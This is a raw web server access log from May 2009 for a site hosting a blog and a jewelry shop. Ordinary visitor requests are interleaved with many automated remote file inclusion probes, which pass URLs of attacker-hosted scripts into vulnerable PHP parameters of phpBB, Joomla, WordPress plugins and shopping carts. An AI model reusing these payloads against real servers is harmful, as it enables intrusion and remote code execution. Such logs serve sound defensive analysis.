88.84.128.40 - - [22/May/2009:09:11:34 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:09:11:35 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:09:11:35 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:11:40 -0700] "GET /logs/access_090207.log/index.php?opcao=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:09:11:40 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:09:11:43 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:09:11:43 -0700] "GET /logs/access_081123.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:11:45 -0700] "GET /logs/index.php?opcao=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:09:11:54 -0700] "GET /logs/access_081116.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:12:01 -0700] "GET /logs/access_090118.log/index.php?opcao=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.247.233.92 - - [22/May/2009:09:12:01 -0700] "GET /logs/access_090124.log//errors.php?error=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:09:12:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:12:02 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:12:02 -0700] "GET /logs/access_080515.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.151.134.36 - - [22/May/2009:09:12:02 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.swedishlegion.se/poll/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [22/May/2009:09:12:12 -0700] "GET /logs/access_080131.log///?_SERVER[DOCUMENT_ROOT]=http://www.importacionesenergia.com/administrator/log.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:09:12:21 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.246.20.221 - - [22/May/2009:09:12:27 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.importacionesenergia.com/administrator/log.txt?? HTTP/1.1" 200 100626 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:12:29 -0700] "GET /logs/access_080808.log//squirrelcart/cart_content.php?cart_isp_root=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:12:29 -0700] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [22/May/2009:09:12:29 -0700] "GET /squirrelcart/cart_content.php?cart_isp_root=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.85.142 - - [22/May/2009:09:12:31 -0700] "GET /logs/access_090107.log//includes/functions_cms.php?phpbb_root_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.85.142 - - [22/May/2009:09:12:31 -0700] "GET /includes/functions_cms.php?phpbb_root_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.230.85.142 - - [22/May/2009:09:12:31 -0700] "GET /logs//includes/functions_cms.php?phpbb_root_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:12:33 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:12:33 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:12:33 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [22/May/2009:09:12:41 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:12:42 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:12:42 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:12:42 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:12:46 -0700] "GET /logs/access_081222.log/index.php?meio=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:12:48 -0700] "GET /logs/access_090117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:12:50 -0700] "GET /index.php?opcao=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 200 41928 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:12:51 -0700] "GET /logs/index.php?meio=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:13:01 -0700] "GET /logs/access_090117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:09:13:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [22/May/2009:09:13:02 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:13:06 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:13:06 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:13:06 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:13:14 -0700] "GET /logs/access_090321.log/index.php?meio=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:18 -0700] "GET /minamijewelry/html/about.html HTTP/1.1" 200 12858 "http://www.google.com/search?q=megumi+marsh&hl=en&sourceid=gd&rls=GGLD,GGLD:2008-16,GGLD:en&aq=t" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:13:19 -0700] "GET /logs/access_090117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:19 -0700] "GET /minamijewelry/html/images/flower_character_mos.jpg HTTP/1.1" 200 3439 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:22 -0700] "GET /minamijewelry/html/images/contact_us_nav_mos.jpg HTTP/1.1" 200 1374 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:22 -0700] "GET /minamijewelry/html/images/bg_color.jpg HTTP/1.1" 200 542 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
69.59.148.76 - - [22/May/2009:09:13:22 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.casualife.ru/Top.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
124.0.73.2 - - [22/May/2009:09:13:24 -0700] "GET /chat/inc/cmses/aedating4CMS.php?dir%5Binc%5D=http://www.nw.or.kr/bbs/icon/idz.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [22/May/2009:09:13:24 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir%5Binc%5D=http://www.nw.or.kr/bbs/icon/idz.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:25 -0700] "GET /minamijewelry/html/images/wind_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:26 -0700] "GET /minamijewelry/html/images/moon_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:26 -0700] "GET /minamijewelry/html/images/main.jpg HTTP/1.1" 200 19269 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:27 -0700] "GET /minamijewelry/html/images/flower_character.jpg HTTP/1.1" 200 3451 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
64.157.4.43 - - [22/May/2009:09:13:27 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:27 -0700] "GET /minamijewelry/html/images/bird_character.jpg HTTP/1.1" 200 2668 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:27 -0700] "GET /minamijewelry/html/images/bird_character_mos.jpg HTTP/1.1" 200 2655 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:27 -0700] "GET /minamijewelry/html/images/wind_character.jpg HTTP/1.1" 200 2891 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:27 -0700] "GET /minamijewelry/html/images/wind_character_mos.jpg HTTP/1.1" 200 2816 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:28 -0700] "GET /minamijewelry/html/images/moon_character_mos.jpg HTTP/1.1" 200 2537 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:28 -0700] "GET /minamijewelry/html/images/dream_character.jpg HTTP/1.1" 200 3130 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:28 -0700] "GET /minamijewelry/html/images/dream_character_mos.jpg HTTP/1.1" 200 3143 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
196.25.27.90 - - [22/May/2009:09:13:28 -0700] "GET /logs/access_080723.log%20/myevent.php?myevent_path=http://www.photolive.cz//components/com_joomlalib/standalone/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:28 -0700] "GET /minamijewelry/html/images/minami_jewelry_lg.jpg HTTP/1.1" 200 4890 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:29 -0700] "GET /minamijewelry/html/images/flower_lg.jpg HTTP/1.1" 200 3046 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:29 -0700] "GET /minamijewelry/html/images/bird_lg.jpg HTTP/1.1" 200 2607 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:31 -0700] "GET /minamijewelry/html/images/moon_character.jpg HTTP/1.1" 200 2499 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:31 -0700] "GET /minamijewelry/html/images/moon_lg.jpg HTTP/1.1" 200 2777 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:31 -0700] "GET /minamijewelry/html/images/dream_lg.jpg HTTP/1.1" 200 2881 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:31 -0700] "GET /minamijewelry/html/images/home_nav.jpg HTTP/1.1" 200 1079 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:32 -0700] "GET /minamijewelry/html/images/home_nav_mos.jpg HTTP/1.1" 200 1148 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:32 -0700] "GET /minamijewelry/html/images/begin_shopping_nav.jpg HTTP/1.1" 200 1633 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:35 -0700] "GET /minamijewelry/html/images/begin_shopping_nav_mos.jpg HTTP/1.1" 200 1673 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:35 -0700] "GET /minamijewelry/html/images/about_designer_nav.jpg HTTP/1.1" 200 1543 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:36 -0700] "GET /minamijewelry/html/images/about_designer_nav_mos.jpg HTTP/1.1" 200 1608 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:36 -0700] "GET /minamijewelry/html/images/custom_made_nav.jpg HTTP/1.1" 200 1431 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:36 -0700] "GET /minamijewelry/html/images/custom_made_nav_mos.jpg HTTP/1.1" 200 1496 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:36 -0700] "GET /minamijewelry/html/images/clearance_nav.jpg HTTP/1.1" 200 1278 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:37 -0700] "GET /minamijewelry/html/images/clearance_nav_mos.jpg HTTP/1.1" 200 1344 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:38 -0700] "GET /minamijewelry/html/images/return_policy_nav.jpg HTTP/1.1" 200 1447 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:38 -0700] "GET /minamijewelry/html/images/return_policy_nav_mos.jpg HTTP/1.0" 200 1513 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:38 -0700] "GET /minamijewelry/html/images/wind_lg.jpg HTTP/1.0" 200 2770 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:38 -0700] "GET /minamijewelry/html/images/testimonials_nav.jpg HTTP/1.0" 200 1376 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:38 -0700] "GET /minamijewelry/html/images/testimonials_nav_mos.jpg HTTP/1.1" 200 1465 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:39 -0700] "GET /minamijewelry/html/images/contact_us_nav.jpg HTTP/1.1" 200 1307 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:39 -0700] "GET /minamijewelry/html/images/terms_nav.jpg HTTP/1.1" 200 986 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:39 -0700] "GET /minamijewelry/html/images/view_cart_button.jpg HTTP/1.1" 200 1628 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:39 -0700] "GET /minamijewelry/html/images/add_cart_button.jpg HTTP/1.1" 200 1713 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:42 -0700] "GET /minamijewelry/html/images/terms_nav_mos.jpg HTTP/1.1" 200 1068 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:42 -0700] "GET /minamijewelry/html/images/kids_nav.jpg HTTP/1.1" 200 1309 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
64.157.4.43 - - [22/May/2009:09:13:43 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
69.90.72.88 - - [22/May/2009:09:13:43 -0700] "GET /logs/access_090510.log/index.php?conteudo=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:13:44 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:13:44 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.133.106.193 - - [22/May/2009:09:13:44 -0700] "GET /logs/access_080315.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:46 -0700] "GET /minamijewelry/html/images/schedule_nav.jpg HTTP/1.1" 200 1156 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:46 -0700] "GET /minamijewelry/html/images/schedule_nav_mos.jpg HTTP/1.1" 200 1245 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:48 -0700] "GET /minamijewelry/html/images/kids_nav_mos.jpg HTTP/1.1" 200 1398 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
69.90.72.88 - - [22/May/2009:09:13:48 -0700] "GET /logs/index.php?conteudo=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:49 -0700] "GET /minamijewelry/html/images/flower_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:50 -0700] "GET /minamijewelry/html/images/flower_sm_mos.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
70.137.94.18 - - [22/May/2009:09:13:50 -0700] "GET /minamijewelry/html/images/bird_sm.jpg HTTP/1.1" 404 275 "http://www.dmulk.com/minamijewelry/html/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
